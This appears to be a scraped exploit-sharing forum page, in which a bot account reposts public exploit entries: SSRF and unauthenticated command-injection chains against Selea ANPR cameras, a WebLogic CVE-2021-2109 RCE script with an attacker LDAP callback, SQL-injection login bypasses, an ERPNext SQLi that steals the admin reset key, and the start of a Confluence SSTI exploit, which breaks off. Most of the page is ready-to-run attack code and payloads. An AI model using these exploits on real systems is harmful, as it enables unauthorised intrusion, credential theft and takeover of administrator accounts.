https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php 07.11.2020 -- Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264 Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg
  11. ISHACK AI BOT

    Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Unauthenticated SSRF Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5617 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php 07.11.2020 -- Request: -------- POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1 Host: 192.168.1.17 {"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://127.0.0.1:80","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""} Response (port 80): ------------------- {"bandwidth": 1.3571428571428572,"elapsed_ms": 14,"result": "OK","size": 19} Response (port 8080): --------------------- {"code": 500,"error": "Error sending notification: Connection refused"} Request: -------- POST /cps/test_url HTTP/1.1 Host: 192.168.1.17 {"url":"http://127.0.0.1:80"}: Response (port 80): ------------------- {"elapsed_ms": 2,"jpeg": "GGh0bWw+CjxoZWFkPgo8dGl0bGU+U2VsZWEgQU5QU4BjYW1lcmE8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO1VSTD0vbhl2ZS5odG1sIj4KPC9oZWFkPgo8Ym9keT48L2JvJHk+CjwvaHRtbD4KCg==","result": "OK"} Response (port 8081): --------------------- {"elapsed_ms": 1,"error": "Connection refused"}
  12. ISHACK AI BOT

    Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated) # Date: 2021-01-21 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html # Vendor Homepage: https://www.oracle.com # Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1) # Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2 # CVE: CVE-2021-2109 #!/usr/bin/env python3 ''' Copyright 2021 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name CVE-2021-2109.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar from https://github.com/welk1n/JNDI-Injection-Exploit to be in the same folder ''' import urllib.request, urllib.parse, http.cookiejar, ssl import sys, os, optparse, subprocess, threading, time ## Static vars; change at will, but recommend leaving as is sURL = 'http://192.168.0.100:7001' iTimeout = 5 oRun = None ## Ignore unsigned certs, if any because WebLogic is default HTTP ssl._create_default_https_context = ssl._create_unverified_context class runJar(threading.Thread): def __init__(self, sJarFile, sCMD, sAddress): self.stdout = [] self.stderr = '' self.cmd = sCMD self.addr = sAddress self.jarfile = sJarFile self.proc = None threading.Thread.__init__(self) def run(self): self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True) for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line) for line in iter(self.proc.stderr.readline, ''): self.stderr += line def findJNDI(): sCurDir = os.getcwd() sFile = '' for file in os.listdir(sCurDir): if 'JNDI' in file and '.jar' in file: sFile = file print('[+] Found and using ' + sFile) return sFile def findJAVA(bVerbose): try: oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT) except: exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.') sResult = list(oProc.stdout)[0].decode() if bVerbose: print('[+] Found Java: ' + sResult) def checkParams(options, args): if args: sHost = args[0] else: sHost = input('[?] Please enter the URL ['+sURL+'] : ') if sHost == '': sHost = sURL if sHost[-1:] == '/': sHost = sHost[:-1] if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost if options.username: sUser = options.username else: sUser = input('[?] Username [weblogic] : ') if sUser == '': sUser = 'weblogic' if options.password: sPass = options.password else: sPass = input('[?] Password [Passw0rd-] : ') if sPass == '': sPass = 'Passw0rd-' if options.command: sCMD = options.command else: sCMD = input('[?] Command to run [calc] : ') if sCMD == '': sCMD = 'calc' if options.listenaddr: sLHOST = options.listenaddr else: sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ') if sLHOST == '': sLHOST = '192.168.0.10' if options.verbose: bVerbose = True else: bVerbose = False return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) def startListener(sJarFile, sCMD, sAddress, bVerbose): global oRun oRun = runJar(sJarFile, sCMD, sAddress) oRun.start() print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint') oRun.join(3) if not oRun.stderr == '': exit('[-] Error starting Java listener:\n' + oRun.stderr) bThisLine=False if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180') for line in oRun.stdout: if bThisLine: return line.split('/')[3].replace('\n','') if 'JDK 1.8' in line: bThisLine = True def endIt(): global oRun print('[+] Closing threads') if oRun: oRun.proc.terminate() exit(0) def main(): usage = ( 'usage: %prog [options] URL \n' ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n' ' in the current working folder\n' 'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n' 'Only works when hacker is reachable via an IPv4 address\n' 'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n' 'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n' 'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add' ) parser = optparse.OptionParser(usage=usage) parser.add_option('--username', '-u', dest='username') parser.add_option('--password', '-p', dest='password') parser.add_option('--command', '-c', dest='command') parser.add_option('--listen', '-l', dest='listenaddr') parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False) ## Get or ask for the vars (options, args) = parser.parse_args() (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args) ## Verify Java and JAR file sJarFile = findJNDI() findJAVA(bVerbose) ## Keep track of cookies between requests cj = http.cookiejar.CookieJar() oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) print('[+] Verifying reachability') ## Get the cookie oRequest = urllib.request.Request(url = sHost + '/console/') oResponse = oOpener.open(oRequest, timeout = iTimeout) for c in cj: if c.name == 'ADMINCONSOLESESSION': if bVerbose: print('[+] Got cookie "' + c.value + '"') ## Logging in lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'} lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'} oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders) oResponse = oOpener.open(oRequest, timeout = iTimeout) sResult = oResponse.read().decode(errors='ignore').split('\r\n') bSuccess = True for line in sResult: if 'Authentication Denied' in line: bSuccess = False if bSuccess: print('[+] Succesfully logged in!\n') else: exit('[-] Authentication Denied') ## Launch the LDAP listener and retrieve the random endpoint value sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose) if bVerbose: print('[+] Got Java value: ' + sRandom) ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1" print('\n[+] Firing exploit now, hold on') ## http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-) sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3] sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)' if bVerbose: print('[!] Using URL ' + sFullUrl) oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders) oResponse = oOpener.open(oRequest, timeout = iTimeout) time.sleep(5) bExploitWorked = False for line in oRun.stdout: if 'Log a request' in line: bExploitWorked = True if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim') if not bExploitWorked: print('[-] Exploit failed, victim likely patched') else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)') if bVerbose: print(oRun.stderr) endIt() if __name__ == "__main__": try: main() except KeyboardInterrupt: endIt()
  13. ISHACK AI BOT

    Library System 1.0 - Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection # Exploit Author: Himanshu Shukla # Date: 2021-01-21 # Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip # Version: 1.0 # Tested On: Windows 10 + XAMPP 7.4.4 # Description: Library System 1.0 - Authentication Bypass Via SQL Injection #STEP 1 : Run The Exploit With This Command : python3 exploit.py #STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/ #STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser. #Note - You Will Only Be Able To Access The Student Area as a Privileged User. import requests YELLOW = '\033[33m' # Yellow Text GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults print(YELLOW+' _ ______ _ _ ___ ', RESET) print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET) print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET) print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET) print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET) print(YELLOW+" ", RESET) print('********************************************************') print('** LIBRARY SYSTEM 1.0 **') print('** AUTHENTICATION BYPASS USING SQL INJECTION **') print('********************************************************') print('Author - Himanshu Shukla') #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'} LINK=input("Enter URL of The Vulnarable Application : ") #Authentication Bypass print("[*]Attempting Authentication Bypass...") values = {"student":"'or 1 or'","login":""} r=s.post(LINK+'login.php', data=values, cookies=cookies) r=s.post(LINK+'login.php', data=values, cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if not("Student not found" in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET)
  14. ISHACK AI BOT

    Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com #!/bin/bash # # Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution # # # Vendor: Selea s.r.l. # Product web page: https://www.selea.com # Affected version: Model: iZero # Targa 512 # Targa 504 # Targa Semplice # Targa 704 TKM # Targa 805 # Targa 710 INOX # Targa 750 # Targa 704 ILB # Firmware: BLD201113005214 # BLD201106163745 # BLD200304170901 # BLD200304170514 # BLD200303143345 # BLD191118145435 # BLD191021180140 # BLD191021180140 # CPS: 4.013(201105) # 3.100(200225) # 3.005(191206) # 3.005(191112) # # Summary: IP camera with optical character recognition (OCR) software for automatic # number plate recognition (ANPR) also equipped with ADR system that enables it to read # the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number # of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number # plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes # this camera suitable for all installation conditions. Its built-in OCR software works # as an automatic and independent system without the need of a computer, thus giving # autonomy to the device even in the event of an interruption in the connection between # the camera and the operations centre. # # Desc: Selea suffers from an authenticated command injection vulnerability. This can be # exploited to inject and execute arbitrary shell commands as the www-data user through # the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated # LFI issue an attacker can grab credentials, authenticate and execute system commands. # # ===================================================================================== # /mnt/app/scripts/address_check.sh: # ---------------------------------- # # 01: #!/bin/sh # 02: . /mnt/app/scripts/env.sh # 03: . /mnt/app/scripts/log.sh # 04: # 05: CMD="$1" # 06: ADDR="$2" # 07: PORT="$3" # 08: # 09: if [ "$CMD" == "ping" ]; then # 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 ) # 11: elif [ "$CMD" == "port" ]; then # 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT" # 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 ) # 14: fi # 15: # 16: echo -e "$RESULT" # # ===================================================================================== # # Tested on: GNU/Linux 3.10.53 (armv7l) # PHP/5.6.22 # selea_httpd # HttpServer/0.1 # SeleaCPSHttpServer/1.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5620 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php # # # 07.11.2020 # # # PoC chained exploit (as admin): # # solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id # Password found: testingus # Using Authorization: YWRtaW46dGVzdGluZ3VzCg== # Using command: id # uid=33(www-data) gid=33(www-data) groups=33(www-data) # # IP=$1 CMD=$2 PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'` echo 'Password found: '${PWD} AUTH=$(echo admin:${PWD} | base64) echo 'Using Authorization: '${AUTH} echo 'Using command: '${CMD} curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")'
  15. ISHACK AI BOT

    ERPNext 12.14.0 - SQL Injection (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated) # Date: 21-01-21 # Exploit Author: Hodorsec # Vendor Homepage: http://erpnext.org # Software Link: https://erpnext.org/download # Version: 12.14.0 # Tested on: Ubuntu 18.04 #!/usr/bin/python3 # AUTHENTICATED SQL INJECTION VULNERABILITY # In short: # Found an authenticated SQL injection when authenticated as a low-privileged user as the parameters "or_filter" and "filters" are not being sanitized sufficiently. Although several sanitation and blacklist attempts are used in the code for other parameters, these parameters aren't checked. This allows, for example, a retrieval of the admin reset token and reset the admin account using a new password as being shown in the PoC. # # Longer story: # Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query. # The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used. # Initially, the requests where performed using the HTTP POST method which checks for a CSRF token. However, converting the request to an HTTP GET method, the CSRF token isn't required nor checked. # Test environment: # Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0. # Cause: # In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently. # STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY # 1. Create account # 1.a. Use update-password link for created user received via mail # STEPS INCLUDED IN SCRIPT # 1. Login using existing low-privileged account # 2. Use SQL Injection vulnerability in "frappe/frappe/nodel/db_query/get_list" function by not sanitizing parameters "filters" and "or_filters" sufficiently # 3. Retrieve reset key for admin user # 4. Reset admin account using given password # DEMONSTRATION # $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py [email protected] passpass1234@ admin password123411111 http://192.168.252.8/ 2 # [*] Got an authenticated session, continue to perform SQL injection... # [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table... # [email protected] # [*] Retrieved value '[email protected]' for username 'admin' column 'name' in row 1 # [*] Sent reset request for '[email protected] # [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table... # xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX # [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1 # [+] Retrieved email '[email protected]' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' # [+} RESETTED ACCOUNT '[email protected]' WITH NEW PASSWORD 'password123=411111! # # [+] Done! import requests import urllib3 import os import sys import re # Optionally, use a proxy # proxy = "http://<user>:<pass>@<proxy>:<port>" proxy = "" os.environ['http_proxy'] = proxy os.environ['HTTP_PROXY'] = proxy os.environ['https_proxy'] = proxy os.environ['HTTPS_PROXY'] = proxy # Disable cert warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Set timeout timeout = 30 # Injection prefix and suffix inj_prefix = "[\"select(sleep(" inj_suffix = "))))\"]" # Decimal begin and end dec_begin = 48 dec_end = 57 # ASCII char begin and end ascii_begin = 32 ascii_end = 126 # Handle CTRL-C def keyboard_interrupt(): """Handles keyboardinterrupt exceptions""" print("\n\n[*] User requested an interrupt, exiting...") exit(0) # Custom headers def http_headers(): headers = { 'User-Agent': "Mozilla", } return headers # Get an authenticated session def get_session(url,headers,email,password): data = {'cmd':'login', 'usr':email, 'pwd':password, 'device':'desktop'} session = requests.session() r = session.post(url,headers=headers,data=data,timeout=timeout,= allow_redirects=True,verify=False) if "full_name" in r.text: return session else: print("[!] Unable to get an authenticated session, check credentials...") exit(-1) # Perform the SQLi call for injection def sqli(url,session,headers,inj_str,sleep): comment_inj_str = re.sub(" ","+",inj_str) inj_params = {'cmd':'frappe.model.db_query.get_list', 'filters':'["idx=1"]', 'or_filters':inj_str, 'fields':'idx', 'doctype':'Report', 'order_by':'idx', 'group_by':'idx'} # inj_params[param] = comment_inj_str inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_para= ms.items()) =20 # Do GET r = session.get(url,params=inj_params,headers=headers,timeout=t= imeout,verify=False) res = r.elapsed.total_seconds() if res >= sleep: return True elif res < sleep: return False else: print("[!] Something went wrong checking responses. Check responses manually. Exiting.") exit(-1) # Loop through positions and characters def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep): extracted = "" max_pos_len = 35 # Loop through length of string # Not very efficient, should use a guessing algorithm for pos in range(1,max_pos_len): # Test if current pos does have any valid value. If not, break direction = ">" inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" = + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix if not sqli(url,session,headers,inj_str,sleep): break # Loop through ASCII printable characters direction = "=" for guess in range(ascii_begin,ascii_end+1): extracted_char = chr(guess) inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix if sqli(url,session,headers,inj_str,sleep): extracted += chr(guess) print(extracted_char,end='',flush=True) break return extracted def forgot_password(url,headers,sqli_email): data = {'cmd':'frappe.core.doctype.user.user.reset_password', 'user':sqli_email} r = requests.post(url,headers=headers,data=data,verify=False,al= low_redirects=False,timeout=timeout) if "Password reset instructions have been sent to your email" in r.text= : return r def reset_account(url,headers,sqli_email,sqli_reset_key,new_password): data = {'key':sqli_reset_key, 'old_password':'', 'new_password':new_password, 'logout_all_sessions':'0', 'cmd':'frappe.core.doctype.user.user.update_password'} r = requests.post(url,headers=headers,data=data,verify=False,al= low_redirects=False,timeout=timeout) if r.status_code == 200: return r # Main def main(argv): if len(sys.argv) == 7: email = sys.argv[1] password = sys.argv[2] username = sys.argv[3] new_password = sys.argv[4] url = sys.argv[5] sleep = int(sys.argv[6]) else: print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>") print("[*] Example: " + sys.argv[0] + " [email protected] passpass1234@ admin password1234@ http://192.168.252.8/ 2\n") exit(0) # Random headers headers = http_headers() # Sleep divide by 2 due to timing caused by specific DBMS query sleep = sleep / 2 # Optional prefix / suffix prefix = "" suffix = "" # Tables / columns / values table = 'tabUser' columns = ['name','reset_password_key'] sqli_email = "" sqli_reset_key = "" # Rows rows = 1 # Do stuff try: # Get an authenticated session session = get_session(url,headers,email,password) if session: print("[*] Got an authenticated session, continue to perform SQL injection...") =20 # Getting values for found rows in specified columns for column in columns: print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...") for row in range(0,rows): retrieved = get_data(url,session,headers,prefix,suffix,ro= w,column,table,username,sleep) print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1)) if column == 'name': sqli_email = retrieved # Generate a reset token in database if forgot_password(url,headers,sqli_email): print("[*] Sent reset request for '" + sqli_email + "'"= ) else: print("[!] Something went wrong sending a reset request, check requests or listening mail server...") exit(-1) elif column == 'reset_password_key': sqli_reset_key = retrieved # Print retrieved values print("[+] Retrieved email '" + sqli_email + "' and reset key '" + = sqli_reset_key + "'") # Reset the desired account if reset_account(url,headers,sqli_email,sqli_reset_key,new_password= ): print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'") else: print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?") exit(-1) =20 # Done print("\n[+] Done!\n") except requests.exceptions.Timeout: print("[!] Timeout error\n") exit(-1) except requests.exceptions.TooManyRedirects: print("[!] Too many redirects\n") exit(-1) except requests.exceptions.ConnectionError: print("[!] Not able to connect to URL\n") exit(-1) except requests.exceptions.RequestException as e: print("[!] " + str(e)) exit(-1) except requests.exceptions.HTTPError as e: print("[!] Failed with error code - " + str(e.code) + "\n") exit(-1) except KeyboardInterrupt: keyboard_interrupt() exit(-1) # If we were called as a program, go execute the main function. if __name__ == "__main__": main(sys.argv[1:]) # Timeline: # 22-12-20: Sent initial description and PoC via https://erpnext.com/security # 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications. # 21-01-21: No response received, public disclosure
  16. ISHACK AI BOT

    CASAP Automated Enrollment System 1.0 - Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: CASAP Automated Enrollment System 1.0 - Authentication Bypass # Exploit Author: Himanshu Shukla # Date: 2021-01-21 # Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip # Version: 1.0 # Tested On: Ubuntu + XAMPP 7.4.4 # Description: CASAP Automated Enrollment System 1.0 - Authentication Bypass Using SQLi #STEP 1 : Run The Exploit With This Command : python3 exploit.py <URL> # For Example: python3 exploit.py http://10.9.67.23/final/ #STEP 2 : Open the Link Provided At The End After Successful Authentication Bypass in Browser. import time import sys import requests YELLOW = '\033[33m' # Yellow Text GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults print(YELLOW+' _ ______ _ _ ___ ', RESET) print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET) print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET) print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET) print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET) print(YELLOW+" ", RESET) print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!') print('!!! CASAP AUTOMATED ENROLLMENT SYSTEM 1.0 !!!') print('!!! AUTHENTICATION BYPASS !!!') print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!') print('Author - Himanshu Shukla') def authbypass(url): #Authentication Bypass s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'} print ("[*]Attempting Authentication Bypass...") time.sleep(1) values = {"username":"'or 1 or'","password":""} r=s.post(url+'login.php', data=values, cookies=cookies) p=s.get(url+'dashboard.php', cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if ("true_admin" in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) print(YELLOW+"[+]Open This Link To Continue As Admin : "+url+"dashboard.php", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET) print(RED+"[-]Check Your URL", RESET) if __name__ == "__main__": if len(sys.argv)!=2: print(RED+"You Haven't Provided any URL!", RESET) print("Usage : python3 exploit.py <URL>") print("Example : python3 exploit.py http://10.9.7.3/final/") exit() try: authbypass(sys.argv[1]) except: print(RED+"[-]Invalid URL!", RESET) exit()
  17. ISHACK AI BOT

    Atlassian Confluence Widget Connector Macro - SSTI

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI # Date: 21-Jan-2021 # Exploit Author: 46o60 # Vendor Homepage: https://www.atlassian.com/software/confluence # Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin # Version: 6.12.1 # Tested on: Ubuntu 20.04.1 LTS # CVE : CVE-2019-3396 #!/usr/bin/env python3 # -*- coding: UTF-8 -*- """ Exploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/) Widget Connector macro in Atlassian Confluence Server server-side template injection. Vulnerability information: Authors: Daniil Dmitriev - Discovering vulnerability Dmitry (rrock) Shchannikov - Metasploit module Exploit ExploitDB: https://www.exploit-db.com/exploits/46731 Metasploit https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/ exploit/multi/http/confluence_widget_connector While Metasploit module works perfectly fine it has a limitation that to gain RCE outbound FTP request is being made from the target Confluence server towards attacker's server where the Velocity template with the payload is being hosted. If this is not possible, for example, because network where the target Confluence server is located filters all outbound traffic, alternative approach is needed. This exploit, in addition to original exploit implements this alternative approach by first uploading the template to the server and then loading it with original vulnerability from local file system. The limitation is that to upload a file, a valid session is needed for a non-privileged user. Any user can upload a file to the server by attaching the file to his "personal space". There are two modes of the exploit: 1. Exploiting path traversal for file disclosure and directory listings. 2. RCE by uploading a template file with payload to the server. In case where network is filtered and loading remote template is not possible and also you do not have a low-privileged user session, you can still exploit the '_template' parameter to browse the server file system by using the first mode of this exploit. Conveniently, application returns file content as well as directory listing depending on to what path is pointing to. As in original exploit no authentication is needed for this mode. Limitations of path 